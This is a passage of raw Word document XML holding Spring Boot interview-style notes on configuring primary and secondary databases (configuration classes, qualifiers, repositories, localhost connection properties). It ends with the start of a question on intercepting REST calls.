          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08C637BE"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Department saveDepartment(Department department) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37552F38"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departmentRepository.save(department);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A013DDA"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 xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAEAB1C"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3E745FC" w14:textId="77777777" w:rsidR="000E5C30" w:rsidRPr="002C6305" w:rsidRDefault="000E5C30"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6. Using Multiple Databases in the Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A74B547"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Now, you can use both repositories in your service class. Data for each entity will be persisted to the respective databases (Primary and Secondary). When you need to query or save data, you can directly use the repositories to interact with the corresponding database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5B51BE" w14:textId="77777777" w:rsidR="000E5C30"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B808F49">
          <v:rect id="_x0000_i2671" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5B9D8C" w14:textId="77777777" w:rsidR="000E5C30" w:rsidRPr="002C6305" w:rsidRDefault="000E5C30"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ummary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B7CE31"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o configure multiple databases in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236DE879"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dd necessary database dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7C260D"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Define separate configuration classes for each database, setting up DataSource, EntityManagerFactory, and TransactionManager.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CC8E20"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e @EnableJpaRepositories to specify the package for each database’s repositories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D752D74"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e the database properties for each database in application.properties or application.yml.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335D8E16"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Define repositories for each database and inject them in the service layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2720BEC1" w14:textId="77777777" w:rsidR="000E5C30" w:rsidRPr="002C6305" w:rsidRDefault="000E5C30"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By following this approach, you can easily manage multiple databases in a single Spring Boot application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFD7B31" w14:textId="12219194"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CA8C887">
          <v:rect id="_x0000_i2672" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AC1454" w14:textId="22CEE8A7" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="00827C49">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="637" w:name="_Toc196308117"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does your application know I am using a particular database</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="637"/>
    </w:p>
    <w:p w14:paraId="5F2A6ABE" w14:textId="0F5F979F" w:rsidR="00B56F6C" w:rsidRPr="002C6305" w:rsidRDefault="00B56F6C"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 a Spring Boot application that uses multiple databases, the application knows which database to use through the configuration defined for each database. Specifically, Spring Boot identifies and uses a particular database based on the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> classes and the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>application.properties or application.yml</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> files. Here's how the application determines which database to use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794DEA4A" w14:textId="77777777" w:rsidR="00B56F6C" w:rsidRPr="002C6305" w:rsidRDefault="00B56F6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Key Steps in Database Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D220EF8"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onfiguration Classes</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA5241F" w14:textId="77777777" w:rsidR="00B56F6C" w:rsidRPr="002C6305" w:rsidRDefault="00B56F6C"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define separate @Configuration classes for each database, where you specify how each DataSource is configured (e.g., database URL, username, password).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0067A5E9" w14:textId="77777777" w:rsidR="00B56F6C" w:rsidRPr="002C6305" w:rsidRDefault="00B56F6C"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se configuration classes also define the EntityManagerFactory and TransactionManager for each database. These beans tell Spring Boot how to manage the persistence context for each database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23549DA9"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ing Qualifiers</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003110DA" w14:textId="77777777" w:rsidR="00B56F6C" w:rsidRPr="002C6305" w:rsidRDefault="00B56F6C"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hen defining multiple DataSource beans, @Qualifier annotations are used to differentiate between the primary and secondary databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75601C63" w14:textId="77777777" w:rsidR="00B56F6C" w:rsidRPr="002C6305" w:rsidRDefault="00B56F6C"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ensures that Spring Boot knows which DataSource to use when interacting with a particular database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032DEDB8"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pplication.properties (or application.yml)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14054EFD" w14:textId="77777777" w:rsidR="00B56F6C" w:rsidRPr="002C6305" w:rsidRDefault="00B56F6C"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database configurations (URLs, credentials, etc.) are specified in the application.properties or application.yml file using distinct property names.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB3FAA8" w14:textId="77777777" w:rsidR="00B56F6C" w:rsidRPr="002C6305" w:rsidRDefault="00B56F6C"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For example, you might have spring.datasource.primary for the primary database and spring.datasource.secondary for the secondary database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A3D918" w14:textId="77777777" w:rsidR="00B56F6C" w:rsidRPr="002C6305" w:rsidRDefault="00B56F6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How the Application Knows Which Database to Use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CC544D"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Base on Configuration Class</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECAB4A2" w14:textId="77777777" w:rsidR="00B56F6C" w:rsidRPr="002C6305" w:rsidRDefault="00B56F6C"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hen Spring Boot starts up, it scans the configuration classes (using @Configuration) for the beans related to the database connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4180A090" w14:textId="77777777" w:rsidR="00B56F6C" w:rsidRPr="002C6305" w:rsidRDefault="00B56F6C"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Primary annotation is used in the configuration of the primary database to indicate that it should be the default DataSource unless explicitly overridden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9C9BEF" w14:textId="77777777" w:rsidR="00B56F6C" w:rsidRPr="002C6305" w:rsidRDefault="00B56F6C"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f a DataSource or EntityManagerFactory is needed, Spring Boot looks for these beans in the respective configuration classes and injects them accordingly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5917280B"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rofiles (Optional)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68681086" w14:textId="77777777" w:rsidR="00B56F6C" w:rsidRPr="002C6305" w:rsidRDefault="00B56F6C"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f you need to select a database based on environments (e.g., development, testing, production), you can use Spring Profiles. By using the @Profile annotation or configuring profiles in the application.properties, you can define which database to use in each environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4EDF69" w14:textId="77777777" w:rsidR="00B56F6C" w:rsidRPr="002C6305" w:rsidRDefault="00B56F6C"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For instance, application-dev.properties and application-prod.properties might have different configurations for the databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDDAD37"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Repository Setup</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224AEA61" w14:textId="77777777" w:rsidR="00B56F6C" w:rsidRPr="002C6305" w:rsidRDefault="00B56F6C"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hen repositories are set up for each database, you configure the package location with @EnableJpaRepositories to specify which database (and EntityManagerFactory) should be used for that repository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0E4516" w14:textId="77777777" w:rsidR="00B56F6C" w:rsidRPr="002C6305" w:rsidRDefault="00B56F6C"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 Boot will then automatically use the correct DataSource based on the repository’s configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517D1929" w14:textId="77777777" w:rsidR="00B56F6C" w:rsidRPr="002C6305" w:rsidRDefault="00B56F6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lastRenderedPageBreak/>
        <w:t>Example Walkthrough:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473B0E44" w14:textId="77777777" w:rsidR="00B56F6C" w:rsidRPr="002C6305" w:rsidRDefault="00B56F6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Primary Database Configuration (DataSource1Config):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9F0E69"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ation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F8A577"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ableTransactionManagement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F09F79"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ableJpaRepositories(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E22A53F"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asePackages = "com.example.repository.primary", // For Primary DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322A35E2"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ntityManagerFactoryRef = "primaryEntityManagerFactory",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1861EA55"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ransactionManagerRef = "primaryTransactionManager"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F678070"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0B7466B"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DataSource1Config {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521548EB"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mary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159B353E"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ean(name = "primaryDataSource")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E564524"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ConfigurationProperties(prefix = "spring.datasource.primary")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA76A11"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DataSource dataSource() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079CEEE9"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DataSourceBuilder.create().build();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A86273B"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779BB9F4" w14:textId="77777777" w:rsidR="00B56F6C" w:rsidRPr="002C6305" w:rsidRDefault="00B56F6C" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C39B656"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mary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D14BBE9"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ean(name = "primaryEntityManagerFactory")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F79BC19"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LocalContainerEntityManagerFactoryBean entityManagerFactory(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C31FED8"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ntityManagerFactoryBuilder builder,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050A96AA"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Qualifier("primaryDataSource") DataSource dataSource) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0242A458"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builder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A77A5E"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dataSource(dataSource)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210E3D0C"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ackages("com.example.model.primary")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A48B81F"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ersistenceUnit("primary")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CC5109"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uild();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434D7C98"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0EB1A126" w14:textId="77777777" w:rsidR="00B56F6C" w:rsidRPr="002C6305" w:rsidRDefault="00B56F6C" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F7FDEAF"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mary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778EBC08"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ean(name = "primaryTransactionManager")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D084A7"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PlatformTransactionManager transactionManager(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7DDD5A"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Qualifier("primaryEntityManagerFactory") EntityManagerFactory entityManagerFactory) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA181A3"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JpaTransactionManager(entityManagerFactory);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F7300B"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5FAEA11"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75F2605F" w14:textId="77777777" w:rsidR="00B56F6C" w:rsidRPr="002C6305" w:rsidRDefault="00B56F6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Secondary Database Configuration (DataSource2Config):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E680050"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ation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E0FB2B"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ableTransactionManagement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20106F13"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ableJpaRepositories(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3181E633"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asePackages = "com.example.repository.secondary", // For Secondary DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F68F224"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ntityManagerFactoryRef = "secondaryEntityManagerFactory",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581E3115"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ransactionManagerRef = "secondaryTransactionManager"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194DE2F3"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C084277"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DataSource2Config {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EAC64B" w14:textId="77777777" w:rsidR="00B56F6C" w:rsidRPr="002C6305" w:rsidRDefault="00B56F6C" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20C5F6C7"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ean(name = "secondaryDataSource")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6598E75D"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ConfigurationProperties(prefix = "spring.datasource.secondary")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F0C808"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DataSource dataSource() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7136AE4C"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DataSourceBuilder.create().build();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C9A02E"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2712E73E" w14:textId="77777777" w:rsidR="00B56F6C" w:rsidRPr="002C6305" w:rsidRDefault="00B56F6C" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B3E09E5"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ean(name = "secondaryEntityManagerFactory")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360E5DE6"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LocalContainerEntityManagerFactoryBean entityManagerFactory(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603513E0"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ntityManagerFactoryBuilder builder,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F48519D"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Qualifier("secondaryDataSource") DataSource dataSource) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446FDAB0"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 xml:space="preserve">        return builder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12256616"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dataSource(dataSource)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCA0CCB"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ackages("com.example.model.secondary")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4559A76E"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ersistenceUnit("secondary")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B78FF14"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uild();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDE6D1F"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6F0D0358" w14:textId="77777777" w:rsidR="00B56F6C" w:rsidRPr="002C6305" w:rsidRDefault="00B56F6C" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="614632F0"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ean(name = "secondaryTransactionManager")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1D17A6"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PlatformTransactionManager transactionManager(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40211BD0"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Qualifier("secondaryEntityManagerFactory") EntityManagerFactory entityManagerFactory) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5134D29A"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JpaTransactionManager(entityManagerFactory);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72804831"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E5E6F5F"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7E354D2" w14:textId="77777777" w:rsidR="00B56F6C" w:rsidRPr="002C6305" w:rsidRDefault="00B56F6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application.properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7739D6CD"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Primary Database (MySQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F26080"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primary.url=jdbc:mysql://localhost:3306/primarydb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6CC2DF"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primary.username=root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007CE3F2"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primary.password=root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52416E64"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primary.driver-class-name=com.mysql.cj.jdbc.Driver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3334C401" w14:textId="77777777" w:rsidR="00B56F6C" w:rsidRPr="002C6305" w:rsidRDefault="00B56F6C" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A5018DB"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Secondary Database (PostgreSQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD64FC4"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secondary.url=jdbc:postgresql://localhost:5432/secondarydb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BEF39C"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secondary.username=postgres</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7594869A"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secondary.password=postgres</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFCC777"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secondary.driver-class-name=org.postgresql.Driver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457D1472" w14:textId="77777777" w:rsidR="00B56F6C" w:rsidRPr="002C6305" w:rsidRDefault="00B56F6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4. Repository Definition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8628B0"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pository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D3C885"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interface EmployeeRepository extends JpaRepository&lt;Employee, Long&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C07553"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Methods for Employee DB (Primary Database)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C61D748"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108CAEBD" w14:textId="77777777" w:rsidR="00B56F6C" w:rsidRPr="002C6305" w:rsidRDefault="00B56F6C" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00184A60"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pository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEA03D1"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interface DepartmentRepository extends JpaRepository&lt;Department, Long&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A13295"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Methods for Department DB (Secondary Database)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1E5472"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3F9A7CD8" w14:textId="77777777" w:rsidR="00B56F6C" w:rsidRPr="002C6305" w:rsidRDefault="00B56F6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ummary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B445CF"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onfiguration classes</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> define the database details and specify which DataSource to use for each database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E6D9C9"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rimary</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> annotation marks the default database (e.g., the primary database).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3DC7B7"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Qualifier</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used to specify which DataSource bean should be injected where multiple databases are configured.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26238D33"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nableJpaRepositories</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> specifies which repository corresponds to which DataSource and database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CECAF93"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pplication.properties</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application.yml</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> holds the configuration details, including the credentials and connection properties for each database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F187045" w14:textId="77777777" w:rsidR="00B56F6C" w:rsidRPr="002C6305" w:rsidRDefault="00B56F6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 Boot will use the appropriate DataSource, EntityManagerFactory, and TransactionManager based on the configuration and context, allowing you to interact with different databases within the same application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9A1F20" w14:textId="7BB6B3C6"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97C96EC">
          <v:rect id="_x0000_i2673" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E4402D" w14:textId="45F16E35" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="00827C49">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="638" w:name="_Toc196308118"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How are REST calls intercepted in our project? How is the call happening</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="638"/>
    </w:p>
    <w:p w14:paraId="1CB09A53" w14:textId="7D10816C" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5"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a Spring Boot application, REST calls can be intercepted and managed through various mechanisms such as filters, interceptors, and aspect-oriented programming (AOP). The exact method used for intercepting REST calls depends on your project requirements, such as whether you need to add logging, security, authentication, or modify the response before it's sent back to the client.</w:t>
      </w:r>
    </w:p>
